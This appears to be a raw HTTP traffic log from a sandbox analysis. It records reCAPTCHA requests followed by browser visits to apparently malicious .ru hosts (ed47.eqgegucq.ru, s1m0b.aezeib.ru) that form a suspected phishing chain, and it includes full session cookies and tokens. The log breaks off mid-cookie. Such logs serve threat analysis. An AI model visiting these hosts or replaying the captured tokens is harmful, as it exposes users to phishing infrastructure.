              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA7RJtq4W7dm7kaMTxtn8NggAmAvbiprzXKjhbiJwD7SYiiY-Kx8-EBm1JR2uNfcCNkgFERzEEJv8pgriiLM80zAjRNF9j_F9KSNcovPIyw9e6GToinS0ZtWwJCsh0fjSpFpnFhQ50CKVbTdAIwkqzNxFXSrJ52epVtdHeVnFQpySsb9vvxfe4Ur2NzA-Wla6xdJS62a&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLbgygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/reload?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA7RJtq4W7dm7kaMTxtn8NggAmAvbiprzXKjhbiJwD7SYiiY-Kx8-EBm1JR2uNfcCNkgFERzEEJv8pgriiLM80zAjRNF9j_F9KSNcovPIyw9e6GToinS0ZtWwJCsh0fjSpFpnFhQ50CKVbTdAIwkqzNxFXSrJ52epVtdHeVnFQpySsb9vvxfe4Ur2NzA-Wla6xdJS62a&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA7RJtq4W7dm7kaMTxtn8NggAmAvbiprzXKjhbiJwD7SYiiY-Kx8-EBm1JR2uNfcCNkgFERzEEJv8pgriiLM80zAjRNF9j_F9KSNcovPIyw9e6GToinS0ZtWwJCsh0fjSpFpnFhQ50CKVbTdAIwkqzNxFXSrJ52epVtdHeVnFQpySsb9vvxfe4Ur2NzA-Wla6xdJS62a&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil&id=2 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLbgygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/replaceimage?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA7RJtq4W7dm7kaMTxtn8NggAmAvbiprzXKjhbiJwD7SYiiY-Kx8-EBm1JR2uNfcCNkgFERzEEJv8pgriiLM80zAjRNF9j_F9KSNcovPIyw9e6GToinS0ZtWwJCsh0fjSpFpnFhQ50CKVbTdAIwkqzNxFXSrJ52epVtdHeVnFQpySsb9vvxfe4Ur2NzA-Wla6xdJS62a&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil&id=2 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/userverify?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA5f9HoPutYyBT2qwEzJOsT6nG8YNTH3FZDW5KtKfrt7YciDGcNlchkbD0_x8edYD-TcJd2wYLmh26nPsdqIRSCUUdq9JHHfbd68pFcR4xnRXC4q9ZJTxEF4wZy_Oz5Ga8FjwRu0iVk7vIeH8bkkLeQ8mRemJu5S9MIXNu1kc-PqZ79aRRIMGVUXtvyrdHSEwliq6Kl-&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CLbgygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=bUO1BXI8H9PgjAPSW9hwuSeI&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cilAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/payload?p=06AFcWeA5f9HoPutYyBT2qwEzJOsT6nG8YNTH3FZDW5KtKfrt7YciDGcNlchkbD0_x8edYD-TcJd2wYLmh26nPsdqIRSCUUdq9JHHfbd68pFcR4xnRXC4q9ZJTxEF4wZy_Oz5Ga8FjwRu0iVk7vIeH8bkkLeQ8mRemJu5S9MIXNu1kc-PqZ79aRRIMGVUXtvyrdHSEwliq6Kl-&k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/userverify?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /recaptcha/api2/clr?k=6Ld2a_8qAAAAAEWn30aGX-jXM4Ke7jhFjq2P_cil HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*X-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _GRECAPTCHA=09ALcxeyoTzcJyVHsxhBQ-8QOp79GsSB_4Pibb9nca6nYULKGnY0_8LoYf1MQ6c4C22f_qn9Mm53X2l4Qxf1X44KA; NID=522=X6RhiUNJJoo8-6NEv2az2UzCEFvqcSlf8YebvfbwQiQud0STqIodEuzK4Otq9wY5-JE0xuaet5xZRXqPh3Ses8zHBZO4QHJbaM0b9dYinAgXVGcAsByjxrimggBR-oWkk03yDzegizaTlI6MfexGARYa75hCv4JebaAvwReJbuSg8EK-fXTW5phBa8mpl5YZzRxpIlC-w_wTQRLX2LM
              Source: global trafficHTTP traffic detected: GET /SaqM/ HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://essaystoolkit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ed47.eqgegucq.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ed47.eqgegucq.ru/SaqM/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ii9UOWtPN0haRGxjdmRtNWRDa3NMUmc9PSIsInZhbHVlIjoiRmZ4WHhFRGRqVG4rV21zemMxRjZEVThqbkJpeG5meVRrOTRqTW9HK1lEd3oxM29ONm9Rd0lBZ25FU3E3eDNsZUdjRlJPV1ZtV2lvdkdzWXhCNSsvZ0F4WkJZekRRUnNyRUZHSlluVmRwOG9DTkVxaWkxRFc5emVoWXljTDN5MUIiLCJtYWMiOiI1MzkzYWZjNGY2NWU1NzA4NTYxNmYxMjRlZGI5Y2IyOWU4YmUwOTc4ODRjY2Q3MTVjOWI2ZjhmZWZhNDEzMWE0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjFuVFVCOEF0ZDVOM3VFVnpuZnMvdVE9PSIsInZhbHVlIjoiMTM5NjN3RFZ6WkJEWmxSNDl0blh0b3JPUUxkSHgybHczd1VYVUxiT3FIelVIZ3EvWTdGWTBLMUlPSXpwL01hZHB5T0tkMDRQL3FnTmNSSkNMNndxVytqUzc4SnRaajVUOGJ3SXhhZVgvWmpMK0ZNS1BWM05aMzZ5Z0I1TEdYdTIiLCJtYWMiOiJjNWM1NDgyMzEzNDE4MjM3YjI0OGM0MGE3NWI4MmVhYzFiNmNmMmMzOTE5MWRiMmE3MGQ4NGI4YWU3NjJiOGE5IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /pani$m01ee HTTP/1.1Host: s1m0b.aezeib.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://ed47.eqgegucq.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ed47.eqgegucq.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pani$m01ee HTTP/1.1Host: s1m0b.aezeib.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://ed47.eqgegucq.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ed47.eqgegucq.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /pani$m01ee HTTP/1.1Host: s1m0b.aezeib.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /SaqM/ HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://ed47.eqgegucq.ru/SaqM/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InY2c0xycEJMMkhqVU56aVZ5YnJCRHc9PSIsInZhbHVlIjoiYUFsQkJBbzVYZTdzeWtVQk1xVzFSbllJM1Z1Mm5TNUtqU3I0VUFZamhiQXFFdkhIQ29BK3hVS21nbkNQWGhDVlp1czFWNlFDSTFGU0J4VDVNZjcxV3ZQRWlJczA0RE5tVi8vYmJUZjA0aVRBMjdEa1d3Szd3OFJ6dDFxWlk0NjEiLCJtYWMiOiJiZDQyYTU2MjE2Yzc2YjkzMjczMmFiZmM3YzI3ZWRiMDA2NmM1NWIzNTg4ZjI0MGVkZTljYTM0Zjg1NDY5NDgyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhLRCtGR1NoTC9lV2xKa2E5dmd1dVE9PSIsInZhbHVlIjoiWHVCdW4vK2FXakx2VWhoYnltK01sa21yenBGTTZlMElwN0NuUzI3NlpCZTMxRWtEVGtmNjRjdmMwMjNGVlZ2YzJ6dGJrQW5RNjkxTjZDRE1qZWMwZkE5UFVMaVY4RHJQVVZtTU5yWnh1MHdVd05ZMlNxRStZZnJoU2dDdTZ5c1IiLCJtYWMiOiJiYzUzZDAxMjY1ZTZkNDNlMmJjMTM2MGEwZTYyMDIwNjUwYTNkMmE3MjgxYjFlMDFmMGZmNDAyMWE4NjU5MDVjIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /yc2BMfvrjsNeHhhExdlRWW6PfXjd9Ovl4 HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InY2c0xycEJMMkhqVU56aVZ5YnJCRHc9PSIsInZhbHVlIjoiYUFsQkJBbzVYZTdzeWtVQk1xVzFSbllJM1Z1Mm5TNUtqU3I0VUFZamhiQXFFdkhIQ29BK3hVS21nbkNQWGhDVlp1czFWNlFDSTFGU0J4VDVNZjcxV3ZQRWlJczA0RE5tVi8vYmJUZjA0aVRBMjdEa1d3Szd3OFJ6dDFxWlk0NjEiLCJtYWMiOiJiZDQyYTU2MjE2Yzc2YjkzMjczMmFiZmM3YzI3ZWRiMDA2NmM1NWIzNTg4ZjI0MGVkZTljYTM0Zjg1NDY5NDgyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhLRCtGR1NoTC9lV2xKa2E5dmd1dVE9PSIsInZhbHVlIjoiWHVCdW4vK2FXakx2VWhoYnltK01sa21yenBGTTZlMElwN0NuUzI3NlpCZTMxRWtEVGtmNjRjdmMwMjNGVlZ2YzJ6dGJrQW5RNjkxTjZDRE1qZWMwZkE5UFVMaVY4RHJQVVZtTU5yWnh1MHdVd05ZMlNxRStZZnJoU2dDdTZ5c1IiLCJtYWMiOiJiYzUzZDAxMjY1ZTZkNDNlMmJjMTM2MGEwZTYyMDIwNjUwYTNkMmE3MjgxYjFlMDFmMGZmNDAyMWE4NjU5MDVjIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /pani$m01ee HTTP/1.1Host: s1m0b.aezeib.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://ed47.eqgegucq.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /zcpJU9RLzEotRfw1OKHO7Ow0ulS8Eg1wjEd1tPuSmTOegy HTTP/1.1Host: ed47.eqgegucq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Ik5rUk54aXFsSFZJNlFjM3h3bUNkd2c9PSIsInZhbHVlIjoiVGUrY3pBTWJkbnpJS3EyMTBOd3RCZTlqMElRdGJmMERVWXFmd0hCWFlpV0N3Q09sRDR6enNhNkt3RUErT1VoUUFjUENDMHpTbC9UbjNQdStSV1VCcWNDeXI2R2Q4OVE0c3c1OUdUVXJqeSttUktTczc5N0M2ZkNZSGZrekFkVEsiLCJtYWMiOiI1NGJkMDZmOTgyYWE1NWFhZmRkN2Q2YzMxZmFiNTJhMjJiNTUxMGZkYzMzZDgxYmYxY2EyMDI5YmNiOGFlMDVlIiwidGFnIjoiIn0%3D; 